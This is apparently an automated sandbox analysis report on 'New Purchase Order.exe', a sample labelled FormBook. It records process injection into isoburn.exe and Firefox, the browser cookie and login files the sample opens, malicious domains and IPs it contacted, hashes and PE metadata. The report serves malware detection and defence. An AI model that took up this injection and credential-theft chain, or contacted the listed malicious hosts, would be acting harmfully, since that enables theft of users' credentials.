                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F6A50 mov eax, dword ptr fs:[00000030h]8_2_016F6A50
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]8_2_01714A35
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01714A35 mov eax, dword ptr fs:[00000030h]8_2_01714A35
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA38 mov eax, dword ptr fs:[00000030h]8_2_0172CA38
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172CA24 mov eax, dword ptr fs:[00000030h]8_2_0172CA24
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0171EA2E mov eax, dword ptr fs:[00000030h]8_2_0171EA2E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0177CA11 mov eax, dword ptr fs:[00000030h]8_2_0177CA11
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]8_2_0172AAEE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0172AAEE mov eax, dword ptr fs:[00000030h]8_2_0172AAEE
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]8_2_01724AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01724AD0 mov eax, dword ptr fs:[00000030h]8_2_01724AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746ACC mov eax, dword ptr fs:[00000030h]8_2_01746ACC
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F0AD0 mov eax, dword ptr fs:[00000030h]8_2_016F0AD0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]8_2_016F8AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_016F8AA0 mov eax, dword ptr fs:[00000030h]8_2_016F8AA0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01746AA4 mov eax, dword ptr fs:[00000030h]8_2_01746AA4
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                  NtWriteVirtualMemory: Direct from: 0x77762E3C
                  NtMapViewOfSection: Direct from: 0x77762D1C
                  NtNotifyChangeKey: Direct from: 0x77763C2C
                  NtCreateMutant: Direct from: 0x777635CC
                  NtResumeThread: Direct from: 0x777636AC
                  NtQuerySystemInformation: Direct from: 0x77762DFC
                  NtAllocateVirtualMemory: Direct from: 0x77762BFC
                  NtReadFile: Direct from: 0x77762ADC
                  NtDelayExecution: Direct from: 0x77762DDC
                  NtWriteVirtualMemory: Direct from: 0x7776490C
                  NtQueryInformationProcess: Direct from: 0x77762C26
                  NtResumeThread: Direct from: 0x77762FBC
                  NtCreateUserProcess: Direct from: 0x7776371C
                  NtSetInformationThread: Direct from: 0x777563F9
                  NtAllocateVirtualMemory: Direct from: 0x77763C9C
                  NtSetInformationThread: Direct from: 0x77762B4C
                  NtQueryAttributesFile: Direct from: 0x77762E6C
                  NtClose: Direct from: 0x77762B6C
                  NtReadVirtualMemory: Direct from: 0x77762E8C
                  NtCreateKey: Direct from: 0x77762C6C
                  NtQuerySystemInformation: Direct from: 0x777648CC
                  NtAllocateVirtualMemory: Direct from: 0x777648EC
                  NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                  NtOpenSection: Direct from: 0x77762E0C
                  NtDeviceIoControlFile: Direct from: 0x77762AEC
                  NtAllocateVirtualMemory: Direct from: 0x77762BEC
                  NtQueryInformationToken: Direct from: 0x77762CAC
                  NtTerminateThread: Direct from: 0x77762FCC
                  NtCreateFile: Direct from: 0x77762FEC
                  NtOpenFile: Direct from: 0x77762DCC
                  NtOpenKeyEx: Direct from: 0x77762B9C
                  NtSetInformationProcess: Direct from: 0x77762C5C
                  NtProtectVirtualMemory: Direct from: 0x77762F9C
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Memory written: C:\Users\user\Desktop\New Purchase Order.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Section loaded: NULL target: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Section loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe, Section loaded: NULL target: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe, Section loaded: NULL target: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\isoburn.exe, Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\isoburn.exe, Thread register set: target process: 8060
                Source: C:\Windows\SysWOW64\isoburn.exe, Thread APC queued: target process: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Process created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"
                Source: C:\Program Files (x86)\keVtbkZBlaWEujnlOlWpgqxSwOUllhtPxqrloDkbHQTeoXmFgbUgspHOQRPjpWUnaQZex\ILRIqlNpKN.exe, Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
                Source: C:\Windows\SysWOW64\isoburn.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Shell_TrayWnd
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progman
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: ?Program Manager
                Source: ILRIqlNpKN.exe, 0000000B.00000000.1710180046.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000B.00000002.2503685681.0000000001530000.00000002.00000001.00040000.00000000.sdmp, ILRIqlNpKN.exe, 0000000F.00000002.2503906875.0000000001470000.00000002.00000001.00040000.00000000.sdmp, Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Queries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\New Purchase Order.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\isoburn.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match, File source: 8.2.New Purchase Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 8.2.New Purchase Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0000000C.00000002.2504764936.0000000004FB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.2504595570.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1802340640.00000000015B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000C.00000002.2500548268.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000F.00000002.2507216654.00000000051A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1801600414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 0000000B.00000002.2505024909.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.1804003305.0000000001A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph, ID: 1567410. Sample: New Purchase Order.exe; Startdate: 03/12/2024; Architecture: WINDOWS; Score: 100. Process chain: New Purchase Order.exe (started) -> New Purchase Order.exe (started) -> ILRIqlNpKN.exe (injected) -> isoburn.exe (started) -> ILRIqlNpKN.exe (injected) and firefox.exe (started).]

                Source | Detection | Scanner | Label | Link
                New Purchase Order.exe | 42% | ReversingLabs | Win32.Backdoor.FormBook |
                New Purchase Order.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                cstrategy.online | 194.76.119.60 | true | false | | unknown
                www.madhf.tech | 103.224.182.242 | true | false | | high
                cyperla.xyz | 31.186.11.114 | true | true | | unknown
                www.bser101pp.buzz | 104.21.58.90 | true | false | | high
                www.cstrategy.online | unknown | unknown | false | | unknown
                www.cyperla.xyz | unknown | unknown | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.58.90 | www.bser101pp.buzz | United States | 13335 | CLOUDFLARENETUS | false
31.186.11.114 | cyperla.xyz | Turkey | 199484 | BETAINTERNATIONALTR | true
103.224.182.242 | www.madhf.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
194.76.119.60 | cstrategy.online | Italy | 202675 | KELIWEBIT | false
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1567410
                                                Start date and time:2024-12-03 14:40:02 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 8m 47s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:17
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:New Purchase Order.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/2@5/4
                                                EGA Information:
                                                • Successful, ratio: 75%
                                                HCA Information:
                                                • Successful, ratio: 89%
                                                • Number of executed functions: 91
                                                • Number of non-executed functions: 288
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • VT rate limit hit for: New Purchase Order.exe
Time | Type | Description
08:40:57 | API Interceptor | 1x Sleep call for process: New Purchase Order.exe modified
09:50:23 | API Interceptor | 150987x Sleep call for process: isoburn.exe modified
                                                        Process:C:\Users\user\Desktop\New Purchase Order.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                        Process:C:\Windows\SysWOW64\isoburn.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                        Category:modified
                                                        Size (bytes):196608
                                                        Entropy (8bit):1.1215420383712111
                                                        Encrypted:false
                                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.7780199156633865
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:New Purchase Order.exe
                                                        File size:814'080 bytes
                                                        MD5:225b541dd84b7d8cbd7cb719a80e4df9
                                                        SHA1:192a656a280cf136ac1cc91019bf28b057cc7a50
                                                        SHA256:d9984c8e232d51fee8996efff6a296be9fa8f9957435269d0c23e1b1fd4eb061
                                                        SHA512:1a03d5c5e4f74aaa2362652541493c31a021ae6b189d5e3fef5983b3bdc5c0629e3ad1f4ba66fdad970feeb56e41b044d5a483c042a32ff8671a3b6c9cd8633f
                                                        SSDEEP:12288:f7hmIR4R52J+XtmPwzF9ShSdWWpNlkqQ/MWi8IT0YoU4+/awLSdG5DJ4Zf+mSgak:9mIeeUHSAd1pkP/M3LT0yirQWIpuMI
                                                        TLSH:D005F19C3611B15FC90785314E60FCB8AA582DAE9707D313A6DB2EEFBD1D8578E041E2
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.Ng..............0......P.......9... ...@....@.. ....................................@................................
                                                        Icon Hash:033424c4c199d839
                                                        Entrypoint:0x4c399e
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x674EA460 [Tue Dec 3 06:25:36 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc3944 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc19a4 | 0xc1a00 | 5e8e8f462e9391895ef70f8148c0a15d | False | 0.9093871045836023 | data | 7.7796093100623445 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc4000 | 0x4ca8 | 0x4e00 | 81da0f880a16dab606521c6cfc3b6369 | False | 0.9410556891025641 | data | 7.769002519883347 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | fd9f7aee487310069b13c9400b2bb006 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc4130 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | - | - | 0.9932852661126094
RT_GROUP_ICON | 0xc882c | 0x14 | data | - | - | 1.05
RT_VERSION | 0xc8840 | 0x278 | data | - | - | 0.47310126582278483
RT_MANIFEST | 0xc8ab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | - | - | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 14:42:06.926243067 CET | 192.168.2.7 | 1.1.1.1 | 0xb022 | Standard query (0) | www.cyperla.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:24.238840103 CET | 192.168.2.7 | 1.1.1.1 | 0x7fc5 | Standard query (0) | www.cstrategy.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:25.606462955 CET | 192.168.2.7 | 1.1.1.1 | 0x7fc5 | Standard query (0) | www.cstrategy.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:40.144525051 CET | 192.168.2.7 | 1.1.1.1 | 0x2478 | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:55.254833937 CET | 192.168.2.7 | 1.1.1.1 | 0xc6e8 | Standard query (0) | www.bser101pp.buzz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:42:07.589802027 CET | 1.1.1.1 | 192.168.2.7 | 0xb022 | No error (0) | www.cyperla.xyz | cyperla.xyz | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:42:07.589802027 CET | 1.1.1.1 | 192.168.2.7 | 0xb022 | No error (0) | cyperla.xyz | - | 31.186.11.114 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:25.274430990 CET | 1.1.1.1 | 192.168.2.7 | 0x7fc5 | No error (0) | www.cstrategy.online | cstrategy.online | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:42:25.274430990 CET | 1.1.1.1 | 192.168.2.7 | 0x7fc5 | No error (0) | cstrategy.online | - | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:25.743674040 CET | 1.1.1.1 | 192.168.2.7 | 0x7fc5 | No error (0) | www.cstrategy.online | cstrategy.online | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:42:25.743674040 CET | 1.1.1.1 | 192.168.2.7 | 0x7fc5 | No error (0) | cstrategy.online | - | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:42:40.739541054 CET | 1.1.1.1 | 192.168.2.7 | 0x2478 | No error (0) | www.madhf.tech | - | 103.224.182.242 | A (IP address) | IN (0x0001) | false
